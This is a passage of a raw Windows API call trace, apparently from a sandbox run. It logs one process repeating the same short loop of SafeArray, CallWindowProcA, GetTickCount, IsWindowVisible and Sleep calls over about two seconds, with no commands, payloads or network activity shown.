SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.932] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116229e [0199.932] GetTickCount () returned 0x37a1e [0199.932] GetLastError () returned 0x578 [0199.932] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.932] GetCurrentProcessId () returned 0xa38 [0199.932] CoFreeUnusedLibraries () [0199.932] GetTickCount () returned 0x37a1e [0199.932] GetTickCount () returned 0x37a1e [0199.932] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.932] Sleep (dwMilliseconds=0x0) [0199.993] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0199.994] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0199.994] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0199.994] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11622dd [0199.994] GetTickCount () returned 0x37a5d [0199.994] GetLastError () returned 0x578 [0199.994] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0199.994] GetCurrentProcessId () returned 0xa38 [0199.994] CoFreeUnusedLibraries () [0199.994] GetTickCount () returned 0x37a5d [0199.994] GetTickCount () returned 0x37a5d [0199.995] IsWindowVisible (hWnd=0x7028c) returned 0 [0199.995] Sleep (dwMilliseconds=0x0) [0200.040] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.041] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.041] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.041] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116230b [0200.041] GetTickCount () returned 0x37a8b [0200.041] GetLastError () returned 0x578 [0200.041] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.041] GetCurrentProcessId () returned 0xa38 [0200.041] CoFreeUnusedLibraries () [0200.041] GetTickCount () returned 0x37a8b [0200.041] GetTickCount () returned 0x37a8b [0200.041] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.041] Sleep (dwMilliseconds=0x0) [0200.094] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.095] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.095] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.095] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116233a [0200.095] GetTickCount () returned 0x37aba [0200.095] GetLastError () returned 0x578 [0200.095] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.095] GetCurrentProcessId () returned 0xa38 [0200.095] CoFreeUnusedLibraries () [0200.095] GetTickCount () returned 0x37aba [0200.095] GetTickCount () returned 0x37aba [0200.095] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.095] Sleep (dwMilliseconds=0x0) [0200.133] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.134] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.134] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.134] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162369 [0200.134] GetTickCount () returned 0x37ae9 [0200.134] GetLastError () returned 0x578 [0200.134] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.134] GetCurrentProcessId () returned 0xa38 [0200.134] CoFreeUnusedLibraries () [0200.134] GetTickCount () returned 0x37ae9 [0200.134] GetTickCount () returned 0x37ae9 [0200.134] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.134] Sleep (dwMilliseconds=0x0) [0200.180] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.181] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.181] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.181] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162398 [0200.181] GetTickCount () returned 0x37b18 [0200.181] GetLastError () returned 0x578 [0200.181] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.182] GetCurrentProcessId () returned 0xa38 [0200.182] CoFreeUnusedLibraries () [0200.182] GetTickCount () returned 0x37b18 [0200.182] GetTickCount () returned 0x37b18 [0200.182] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.182] Sleep (dwMilliseconds=0x0) [0200.274] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.274] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.274] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.274] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11623f5 [0200.274] GetTickCount () returned 0x37b75 [0200.274] GetLastError () returned 0x578 [0200.274] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.275] GetCurrentProcessId () returned 0xa38 [0200.275] CoFreeUnusedLibraries () [0200.275] GetTickCount () returned 0x37b75 [0200.275] GetTickCount () returned 0x37b75 [0200.275] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.275] Sleep (dwMilliseconds=0x0) [0200.351] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.352] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.352] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.352] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162443 [0200.352] GetTickCount () returned 0x37bc3 [0200.352] GetLastError () returned 0x578 [0200.353] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.353] GetCurrentProcessId () returned 0xa38 [0200.353] CoFreeUnusedLibraries () [0200.353] GetTickCount () returned 0x37bc3 [0200.353] GetTickCount () returned 0x37bc3 [0200.353] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.353] Sleep (dwMilliseconds=0x0) [0200.414] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.414] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.415] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.415] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162482 [0200.415] GetTickCount () returned 0x37c02 [0200.415] GetLastError () returned 0x578 [0200.415] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.415] GetCurrentProcessId () returned 0xa38 [0200.415] CoFreeUnusedLibraries () [0200.415] GetTickCount () returned 0x37c02 [0200.415] GetTickCount () returned 0x37c02 [0200.415] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.415] Sleep (dwMilliseconds=0x0) [0200.461] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.461] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.462] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.462] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11624b1 [0200.462] GetTickCount () returned 0x37c31 [0200.462] GetLastError () returned 0x578 [0200.462] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.462] GetCurrentProcessId () returned 0xa38 [0200.462] CoFreeUnusedLibraries () [0200.462] GetTickCount () returned 0x37c31 [0200.462] GetTickCount () returned 0x37c31 [0200.462] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.462] Sleep (dwMilliseconds=0x0) [0200.507] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.508] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.508] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.508] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11624df [0200.508] GetTickCount () returned 0x37c5f [0200.508] GetLastError () returned 0x578 [0200.508] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.508] GetCurrentProcessId () returned 0xa38 [0200.509] CoFreeUnusedLibraries () [0200.509] GetTickCount () returned 0x37c5f [0200.509] GetTickCount () returned 0x37c5f [0200.509] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.509] Sleep (dwMilliseconds=0x0) [0200.555] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.556] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.556] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.556] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116250e [0200.556] GetTickCount () returned 0x37c8e [0200.556] GetLastError () returned 0x578 [0200.556] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.556] GetCurrentProcessId () returned 0xa38 [0200.556] CoFreeUnusedLibraries () [0200.556] GetTickCount () returned 0x37c8e [0200.556] GetTickCount () returned 0x37c8e [0200.556] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.556] Sleep (dwMilliseconds=0x0) [0200.601] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.602] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.602] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.602] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116253d [0200.602] GetTickCount () returned 0x37cbd [0200.602] GetLastError () returned 0x578 [0200.602] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.602] GetCurrentProcessId () returned 0xa38 [0200.602] CoFreeUnusedLibraries () [0200.602] GetTickCount () returned 0x37cbd [0200.602] GetTickCount () returned 0x37cbd [0200.602] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.603] Sleep (dwMilliseconds=0x0) [0200.648] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.649] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.649] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.649] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116256c [0200.649] GetTickCount () returned 0x37cec [0200.649] GetLastError () returned 0x578 [0200.649] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.649] GetCurrentProcessId () returned 0xa38 [0200.649] CoFreeUnusedLibraries () [0200.649] GetTickCount () returned 0x37cec [0200.649] GetTickCount () returned 0x37cec [0200.649] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.649] Sleep (dwMilliseconds=0x0) [0200.695] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.696] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.696] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.696] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116259b [0200.696] GetTickCount () returned 0x37d1b [0200.696] GetLastError () returned 0x578 [0200.696] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.696] GetCurrentProcessId () returned 0xa38 [0200.696] CoFreeUnusedLibraries () [0200.697] GetTickCount () returned 0x37d1b [0200.697] GetTickCount () returned 0x37d1b [0200.697] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.697] Sleep (dwMilliseconds=0x0) [0200.975] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0200.976] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0200.976] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0200.976] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11625d9 [0200.976] GetTickCount () returned 0x37d59 [0200.976] GetLastError () returned 0x578 [0200.976] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0200.977] GetCurrentProcessId () returned 0xa38 [0200.977] CoFreeUnusedLibraries () [0200.977] GetTickCount () returned 0x37d59 [0200.977] GetTickCount () returned 0x37d59 [0200.977] IsWindowVisible (hWnd=0x7028c) returned 0 [0200.977] Sleep (dwMilliseconds=0x0) [0201.273] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.273] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.273] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.273] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162701 [0201.274] GetTickCount () returned 0x37e81 [0201.274] GetLastError () returned 0x578 [0201.274] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.274] GetCurrentProcessId () returned 0xa38 [0201.274] CoFreeUnusedLibraries () [0201.274] GetTickCount () returned 0x37e81 [0201.274] GetTickCount () returned 0x37e81 [0201.274] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.274] Sleep (dwMilliseconds=0x0) [0201.320] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.321] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.321] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.321] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162730 [0201.321] GetTickCount () returned 0x37eb0 [0201.321] GetLastError () returned 0x578 [0201.321] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.321] GetCurrentProcessId () returned 0xa38 [0201.321] CoFreeUnusedLibraries () [0201.321] GetTickCount () returned 0x37eb0 [0201.321] GetTickCount () returned 0x37eb0 [0201.322] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.322] Sleep (dwMilliseconds=0x0) [0201.384] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.385] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.385] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.385] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116276f [0201.385] GetTickCount () returned 0x37eef [0201.385] GetLastError () returned 0x578 [0201.385] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.385] GetCurrentProcessId () returned 0xa38 [0201.386] CoFreeUnusedLibraries () [0201.386] GetTickCount () returned 0x37eef [0201.386] GetTickCount () returned 0x37eef [0201.386] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.386] Sleep (dwMilliseconds=0x0) [0201.429] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.429] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.429] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.430] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116279d [0201.430] GetTickCount () returned 0x37f1d [0201.430] GetLastError () returned 0x578 [0201.430] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.430] GetCurrentProcessId () returned 0xa38 [0201.430] CoFreeUnusedLibraries () [0201.430] GetTickCount () returned 0x37f1d [0201.430] GetTickCount () returned 0x37f1d [0201.430] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.430] Sleep (dwMilliseconds=0x0) [0201.475] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.476] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.476] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.476] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11627cc [0201.476] GetTickCount () returned 0x37f4c [0201.476] GetLastError () returned 0x578 [0201.476] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.476] GetCurrentProcessId () returned 0xa38 [0201.476] CoFreeUnusedLibraries () [0201.476] GetTickCount () returned 0x37f4c [0201.476] GetTickCount () returned 0x37f4c [0201.476] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.476] Sleep (dwMilliseconds=0x0) [0201.537] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.538] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.538] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.538] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x116280b [0201.538] GetTickCount () returned 0x37f8b [0201.539] GetLastError () returned 0x578 [0201.539] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.539] GetCurrentProcessId () returned 0xa38 [0201.539] CoFreeUnusedLibraries () [0201.539] GetTickCount () returned 0x37f8b [0201.539] GetTickCount () returned 0x37f8b [0201.539] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.539] Sleep (dwMilliseconds=0x0) [0201.584] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.585] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.585] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.585] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162839 [0201.585] GetTickCount () returned 0x37fb9 [0201.585] GetLastError () returned 0x578 [0201.585] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.585] GetCurrentProcessId () returned 0xa38 [0201.586] CoFreeUnusedLibraries () [0201.586] GetTickCount () returned 0x37fb9 [0201.586] GetTickCount () returned 0x37fb9 [0201.586] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.586] Sleep (dwMilliseconds=0x0) [0201.631] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.633] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.633] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.633] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162868 [0201.633] GetTickCount () returned 0x37fe8 [0201.633] GetLastError () returned 0x578 [0201.633] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.633] GetCurrentProcessId () returned 0xa38 [0201.634] CoFreeUnusedLibraries () [0201.634] GetTickCount () returned 0x37fe8 [0201.634] GetTickCount () returned 0x37fe8 [0201.634] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.634] Sleep (dwMilliseconds=0x0) [0201.678] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.679] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.679] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.679] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162897 [0201.679] GetTickCount () returned 0x38017 [0201.679] GetLastError () returned 0x578 [0201.679] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.679] GetCurrentProcessId () returned 0xa38 [0201.680] CoFreeUnusedLibraries () [0201.680] GetTickCount () returned 0x38017 [0201.680] GetTickCount () returned 0x38017 [0201.680] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.680] Sleep (dwMilliseconds=0x0) [0201.724] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.725] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.725] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.725] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11628c6 [0201.725] GetTickCount () returned 0x38046 [0201.725] GetLastError () returned 0x578 [0201.725] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.726] GetCurrentProcessId () returned 0xa38 [0201.726] CoFreeUnusedLibraries () [0201.726] GetTickCount () returned 0x38046 [0201.726] GetTickCount () returned 0x38046 [0201.726] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.726] Sleep (dwMilliseconds=0x0) [0201.771] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.773] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.773] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.773] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11628f5 [0201.773] GetTickCount () returned 0x38075 [0201.773] GetLastError () returned 0x578 [0201.773] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.773] GetCurrentProcessId () returned 0xa38 [0201.774] CoFreeUnusedLibraries () [0201.774] GetTickCount () returned 0x38075 [0201.774] GetTickCount () returned 0x38075 [0201.774] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.774] Sleep (dwMilliseconds=0x0) [0201.818] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.819] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.819] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.819] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162923 [0201.819] GetTickCount () returned 0x380a3 [0201.819] GetLastError () returned 0x578 [0201.819] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.819] GetCurrentProcessId () returned 0xa38 [0201.820] CoFreeUnusedLibraries () [0201.820] GetTickCount () returned 0x380a3 [0201.820] GetTickCount () returned 0x380a3 [0201.820] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.820] Sleep (dwMilliseconds=0x0) [0201.958] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0201.959] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0201.959] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0201.959] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162962 [0201.959] GetTickCount () returned 0x380e2 [0201.959] GetLastError () returned 0x578 [0201.959] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0201.959] GetCurrentProcessId () returned 0xa38 [0201.960] CoFreeUnusedLibraries () [0201.960] GetTickCount () returned 0x380e2 [0201.960] GetTickCount () returned 0x380e2 [0201.960] IsWindowVisible (hWnd=0x7028c) returned 0 [0201.960] Sleep (dwMilliseconds=0x0) [0202.005] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.006] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.006] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.006] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x1162991 [0202.006] GetTickCount () returned 0x38111 [0202.006] GetLastError () returned 0x578 [0202.006] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 [0202.006] GetCurrentProcessId () returned 0xa38 [0202.006] CoFreeUnusedLibraries () [0202.006] GetTickCount () returned 0x38111 [0202.006] GetTickCount () returned 0x38111 [0202.006] IsWindowVisible (hWnd=0x7028c) returned 0 [0202.007] Sleep (dwMilliseconds=0x0) [0202.052] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f8f8 | out: ppsaOut=0x18f8f8) returned 0x0 [0202.052] SafeArrayAllocDescriptorEx (in: vt=0x0, cDims=0x1, ppsaOut=0x18f810 | out: ppsaOut=0x18f810) returned 0x0 [0202.052] SafeArrayDestroyDescriptor (psa=0x380f060) returned 0x0 [0202.052] CallWindowProcA (lpPrevWndFunc=0x5dee10, hWnd=0x0, Msg=0x0, wParam=0x0, lParam=0x0) returned 0x11629bf [0202.052] GetTickCount () returned 0x3813f [0202.053] GetLastError () returned 0x578 [0202.053] SafeArrayDestroyDescriptor (psa=0x5e36a0) returned 0x0 